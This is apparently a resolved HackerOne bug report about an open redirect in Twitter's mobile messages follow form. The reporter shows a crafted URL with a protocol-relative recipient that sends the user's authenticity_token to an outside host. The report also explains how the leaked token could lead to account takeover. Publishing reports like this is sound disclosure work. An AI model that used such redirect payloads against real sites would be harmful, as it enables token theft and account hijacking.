Open Redirect leak of authenticity_token lead to full account take over.
Unknown
Vulnerability Details
Hey guys
URL: https://mobile.twitter.com/messages/follow?recipient=/example.com
when I click 'Follow'
I will send my POST request to https://example.com
witch contains my authenticity_token
that can be used for anything like tweeting, following, sending messages, changing username.,.,.etc
it can be used too to Add a mobile number, and then steal the account by recovering it by the mobile number.
Thank You.
Actions
View on HackerOneReport Stats
- Report ID: 49759
- State: Closed
- Substate: resolved
- Upvotes: 5